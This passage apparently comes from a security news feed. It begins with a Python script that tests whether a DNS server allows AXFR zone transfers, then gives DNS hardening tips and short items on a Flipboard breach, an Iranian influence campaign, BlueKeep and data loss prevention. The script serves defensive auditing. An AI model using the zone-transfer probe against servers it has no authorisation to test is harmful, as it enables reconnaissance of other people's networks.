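    return header + encode_name(zone) + struct.pack("!HH", AXFR, 1)


def skip_name(msg: bytes, off: int) -> int:
    """Return the offset just past the (possibly compressed) name at off."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:            # 2-byte compression pointer ends the name
            return off + 2
        off += 1 + length


def parse_response(msg: bytes) -> dict:
    """Pull RCODE and the answer RR types out of one DNS message."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        off = skip_name(msg, off) + 4        # QTYPE + QCLASS
    types = []
    for _ in range(an):
        off = skip_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10 + rdlen
        types.append(rtype)
    return {"txid": txid, "rcode": flags & 0x0F, "answers": an, "types": types}


def classify(parsed: dict) -> str:
    """A permitted AXFR answers NOERROR with the zone's SOA (type 6) as the first RR."""
    if parsed["rcode"] == 0 and parsed["types"][:1] == [6]:
        return "zone transfer allowed: restrict transfers to your secondaries"
    return "zone transfer denied (%s)" % RCODE_NAMES.get(parsed["rcode"], parsed["rcode"])


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection early")
        buf += chunk
    return buf


def check_zone_transfer(server: str, zone: str, port: int = 53, timeout: float = 5.0) -> str:
    """Live check over TCP (AXFR is TCP-only). Reads only the first message, which is
    enough to tell a refusal from a transfer that has started."""
    query = build_axfr_query(zone)
    with socket.create_connection((server, port), timeout=timeout) as sock:
        sock.sendall(struct.pack("!H", len(query)) + query)
        (length,) = struct.unpack("!H", _recv_exact(sock, 2))
        return classify(parse_response(_recv_exact(sock, length)))


def sample_responses(zone: str = "example.com") -> dict:
    """Constructed responses (not captured from any real server) for offline testing."""
    question = build_axfr_query(zone)[12:]
    refused = struct.pack("!HHHHHH", 0x1234, 0x8005, 1, 0, 0, 0) + question
    soa_rdata = (encode_name("ns1." + zone) + encode_name("hostmaster." + zone)
                 + struct.pack("!IIIII", 2019052801, 3600, 900, 604800, 86400))
    soa = b"\xc0\x0c" + struct.pack("!HHIH", 6, 1, 3600, len(soa_rdata)) + soa_rdata
    a_rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([192, 0, 2, 1])
    allowed = struct.pack("!HHHHHH", 0x1234, 0x8400, 1, 3, 0, 0) + question + soa + a_rr + soa
    return {"refused": refused, "allowed": allowed}


if __name__ == "__main__":
    import sys
    print(check_zone_transfer(sys.argv[1], sys.argv[2]))
```

Usage is `python check_axfr.py ns1.example.com example.com` (placeholder names). A server that is correctly locked down answers REFUSED (or NOTAUTH if it does not serve the zone at all); an answer that begins with the SOA means the whole zone is about to follow and the transfer ACL needs fixing.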

Control DNS access using firewalls

Controlling DNS access using firewalls is important. Configure firewalls to block connections from external hosts to DNS servers that are used only for internal client queries. Similarly, there needs to be a firewall policy setting that blocks internal users from using the DNS protocol to connect to external DNS servers. Firewalls can also be configured to regulate queries from DNS servers that are used as caching-only forwarders.

Setting access controls on DNS file systems entries and registry entries

Setting access controls on DNS server-related file system entries and also on registry entries would help secure DNS servers. Such access controls ensure that only accounts that require access to these (file system entries or registry entries) can read or change them.

The post How to Secure DNS Servers and Prevent Security Issues appeared first on .

Flipboard Resets Users’ Passwords after Discovering Security Incident

News and social media aggregator Flipboard reset all users’ passwords after discovering a security incident that might have affected some of their data. On 28 May, the company revealed that its engineering team had recently detected suspicious activity in the network environment where its databases reside. Flipboard responded by launching an investigation and engaging an […]… Read More

The post Flipboard Resets Users’ Passwords after Discovering Security Incident appeared first on The State of Security.

Pro-Iran Campaign Spread Fake News During Mid-Terms

Security researchers have uncovered a major new state-sponsored Iranian influence campaign using dozens of fake news sites and hundreds of spoofed social media accounts in an attempt to manipulate public opinion.

Most of the accounts in question were created between April 2018 and March 2019 and used to spread inauthentic content from sites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front during the US mid-terms, according to FireEye.

Some included profile pics lifted from social media users with the same name, and some described themselves as activists, correspondents, or “free journalist” in their profile.

Others even impersonated US political candidates, such as Republicans Marla Livengood and Jineea Butler. In those cases, the operators plagiarized some of the candidates' legitimate tweets and then added pro-Iranian content.

The content promoted by these accounts was overwhelmingly pro-Iranian, pro-Palestinian and anti-Saudi, anti-Israeli. However, a small percentage of messages were anti-Iran, possibly to add legitimacy to them and/or to draw in those with opposing views who can then be targeted with messages in support of the Islamic Republic.

Interestingly, the campaign appears to have extended to legitimate print and online media sources via guest columns, letters and blog posts republished on these platforms. In some cases, the text for separate articles penned by 'different' individuals was almost identical, or had the same narrative. Most appeared in small local US news outlets.

FireEye said the content was in line with “Iranian political interests in a manner similar to accounts that we have previously assessed to be of Iranian origin.” However, definitive attribution is difficult, especially as most of the accounts have now been suspended.

“Apart from the narratives and messaging promoted, we observed several limited indicators that the network was operated by Iranian actors. For example, one account in the network, @AlexRyanNY, created in 2010, had only two visible tweets prior to 2017, one of which, from 2011, was in Persian and of a personal nature,” FireEye continued.

“Subsequently in 2017, @AlexRyanNY claimed in a tweet to be ‘an Iranian who supported Hillary’ in a tweet directed at a Democratic political strategist. This account, using the display name ‘Alex Ryan’ and claiming to be a Newsday correspondent, appropriated the photograph of a genuine individual also with the first name of Alex.”

In addition, while most accounts in this network had their language set to English, one was set to Persian, the vendor revealed.

BlueKeep RDP flaw: Nearly a million Internet-facing systems are vulnerable

Two weeks have passed since Microsoft released security fixes and mitigation advice to defang expected exploits taking advantage of CVE-2019-0708 (aka BlueKeep), a wormable unauthenticated remote code execution flaw in Remote Desktop Services (RDP). The vulnerability, reported by UK’s National Cyber Security Centre (NCSC), has the potential to be the means for attacks that could rival the 2017 WannaCry onslaught and NotPetya attacks. A recent scanning effort by Robert Graham, head of offensive security research …

The post BlueKeep RDP flaw: Nearly a million Internet-facing systems are vulnerable appeared first on Help Net Security.

4 Reasons Your Organization Needs a Data Loss Prevention Strategy

When deciding how to go about protecting your company’s sensitive data, there are plenty of different solutions to choose from, such as endpoint controls, file system controls, or even network traffic inspection. However, the technology is only as effective as the people and processes in charge of configuring, managing, and monitoring it. That’s why technology should not be your only method of protecting your data, but rather a complement to a strategy consisting of internal policies, procedures, and operations. This approach is called Data Loss Prevention (DLP), and it should be implemented by every organization, regardless of size.

Why exactly should you consider a DLP strategy? Here are four of the main reasons:

1. You have sensitive information.

You have data; every company does. That data is important to your business, your customers, and you. We frequently hear about companies experiencing a data breach and only finding out months, or even years later, that there was a breach. Take Marriott International, for example. Marriott acquired a hotel chain called Starwood in 2016. What Starwood and Marriott didn’t know at the time was that Starwood had been breached in 2014. The attacker remained in the system after Marriott and Starwood merged their systems.

It wasn’t until 2018, four years later, that the breach was discovered. If Marriott had implemented an effective DLP strategy, they could have detected and remediated the breach sooner through a number of different preventive or investigative procedures.

Your data is sensitive to your business’ success and should only be handled by people that you trust: you and your employees (on a least-privilege basis).

2. Human error.

Employees can unintentionally leave sensitive data vulnerable. Whether that means they leave file systems vulnerable to unauthorized access, forget to flag an email as sensitive that contains Personally Identifiable Information (PII), or hand their coworker removable media with a list full of Social Security Numbers used for background checks, it should go without saying that humans can make mistakes.

That’s where a thorough DLP strategy can help: if a DLP solution is configured and monitoring your environment according to your policies, you can set enforced rules that prevent these mistakes and generate accurate reports and alerts. Combine this with employee security training, and you have a chance to prevent the potential damage to your business before it happens.

If you lack the resources to set up those configurations, reports, and alerts, you can hire a Managed Security Service Provider (MSSP) to take care of those for you.

3. Malicious Insider threats.

Consider the following scenario:

You hire an individual and they have been performing expertly. They seem to enjoy the job and they haven’t requested a raise in years. Little did you know that when you hired them, they immediately started stealing and selling your data to the highest bidder. This is an extreme scenario, but it does happen. There are organizations and nation-states that will pay top dollar for your sensitive data, and they will gladly target your employees to do it.

Implementing a DLP strategy that includes thorough scenario training can discourage your employees from being persuaded into selling your data, as well as help catch those who do it. With properly trained employees and an effective chain of command, insiders can be reported by their peers at every possible point and be stopped before serious damage is done to your business’ reputation and resulting profits.

4. This is the 21st century of interconnectivity.

We’re connected to everything these days; it’s human nature to crave popularity, which has caused an obsession with online presence that doesn’t always take protecting sensitive data into account. When there are so many easy ways to send, receive, and view different types of communications from so many devices, it’s easy to blur the line between what belongs on which devices.

We’ve already pointed out that humans make mistakes; why not use a well thought-out DLP strategy and implemented technology to keep an eye on your critical data and tell you when your employees do make those mistakes? Whether you implement your own monitoring team or contract with an MSSP, a DLP solution will solidify those previously blurred lines of where that data does and doesn’t belong.

In summary, you need a DLP strategy because you have sensitive data, you employ humans who can or might want to sell your data, and even the best policies and procedures can’t stop someone from unknowingly exposing your company’s data. A Data Loss Prevention Strategy written with supporting technologies in mind can mitigate those risks.

Learn more about how Managed Security Services can help keep your data secure.

The post 4 Reasons Your Organization Needs a Data Loss Prevention Strategy appeared first on GRA Quantum.